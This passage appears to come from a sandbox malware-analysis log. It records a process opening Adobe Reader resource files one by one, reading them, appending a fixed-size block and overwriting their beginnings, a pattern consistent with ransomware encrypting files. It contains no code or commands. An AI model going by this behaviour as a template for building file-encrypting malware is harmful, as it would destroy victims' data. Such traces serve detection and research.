dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.pt_PT.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.pt_PT.txt", lpUsedDefaultChar=0x0) returned 30 [0098.258] ReadFile (in: hFile=0x204, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.260] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5f46 [0098.260] ReadFile (in: hFile=0x204, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.261] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5f46 [0098.261] WriteFile (in: hFile=0x204, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.607] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0099.607] WriteFile (in: hFile=0x204, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.612] CloseHandle (hObject=0x204) returned 1 [0099.618] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk_SK.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk_sk.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0099.625] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0099.626] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6d76 [0099.631] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0099.638] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.639] ReleaseMutex (hMutex=0x168) returned 1 [0099.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.sk_SK.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.sk_SK.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.sk_SK.txt", lpUsedDefaultChar=0x0) returned 30 [0099.652] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.654] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5d76 [0099.654] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.655] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5d76 [0099.655] WriteFile (in: hFile=0x204, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.656] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0099.656] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.656] CloseHandle (hObject=0x204) returned 1 [0099.660] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0099.661] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0099.661] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x724e [0099.661] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0099.661] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.661] ReleaseMutex (hMutex=0x168) returned 1 [0099.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.uk.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0099.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.uk.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.uk.txt", lpUsedDefaultChar=0x0) returned 27 [0099.661] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.663] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x624e [0099.663] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.663] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x624e [0099.664] WriteFile (in: hFile=0x204, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.664] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0099.664] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.664] CloseHandle (hObject=0x204) returned 1 [0099.664] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0113.609] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0113.609] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x128c [0113.609] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0113.609] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0113.609] ReleaseMutex (hMutex=0x168) returned 1 [0113.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brt.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0113.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brt.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="brt.fca", lpUsedDefaultChar=0x0) returned 7 [0113.610] ReadFile (in: hFile=0x204, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x128c, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2e9f2bc*=0x128c, lpOverlapped=0x0) returned 1 [0113.612] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0113.612] WriteFile (in: hFile=0x204, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1814, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1814, lpOverlapped=0x0) returned 1 [0113.613] CloseHandle (hObject=0x204) returned 1 [0113.614] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz40.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz40.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0113.616] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0113.616] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x17df6 [0113.616] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0113.616] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0113.616] ReleaseMutex (hMutex=0x168) returned 1 [0113.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brz40.hsp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brz40.hsp", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="brz40.hsp", lpUsedDefaultChar=0x0) returned 9 [0113.616] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0113.619] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x16df6 [0113.619] ReadFile (in: hFile=0x204, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0113.620] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x16df6 [0113.620] WriteFile (in: hFile=0x204, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0113.622] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0113.622] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0113.622] CloseHandle (hObject=0x204) returned 1 [0113.622] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can129.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can129.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0113.625] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0113.625] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x45c3d [0113.625] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0113.625] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0113.625] ReleaseMutex (hMutex=0x168) returned 1 [0113.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="can129.hsp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="can129.hsp", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="can129.hsp", lpUsedDefaultChar=0x0) returned 10 [0113.625] ReadFile (in: hFile=0x204, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0113.628] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x44c3d [0113.628] ReadFile (in: hFile=0x204, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0113.630] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x44c3d [0113.631] WriteFile (in: hFile=0x204, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0113.632] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0113.632] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0113.632] CloseHandle (hObject=0x204) returned 1 [0113.633] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0113.634] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0113.634] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2400 [0113.634] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0113.634] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0113.634] ReleaseMutex (hMutex=0x168) returned 1 [0113.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ctl.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0113.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ctl.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ctl.hyp", lpUsedDefaultChar=0x0) returned 7 [0113.635] ReadFile (in: hFile=0x204, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0113.637] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1400 [0113.637] ReadFile (in: hFile=0x204, lpBuffer=0x1e963d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0113.640] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1400 [0113.640] WriteFile (in: hFile=0x204, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0113.641] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0113.641] WriteFile (in: hFile=0x204, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0113.641] CloseHandle (hObject=0x204) returned 1 [0113.641] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0113.642] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0113.642] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x7fac [0113.642] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0113.642] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0113.643] ReleaseMutex (hMutex=0x168) returned 1 [0113.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dan32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dan32.clx", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dan32.clx", lpUsedDefaultChar=0x0) returned 9 [0113.643] ReadFile (in: hFile=0x204, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0113.664] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x6fac [0113.664] ReadFile (in: hFile=0x204, lpBuffer=0x1e963d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.437] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x6fac [0114.437] WriteFile (in: hFile=0x204, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.453] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0114.453] WriteFile (in: hFile=0x204, lpBuffer=0x1e963d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.454] CloseHandle (hObject=0x204) returned 1 [0114.454] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut57.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut57.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0114.456] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0114.456] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xc3c00 [0114.456] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0114.456] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.456] 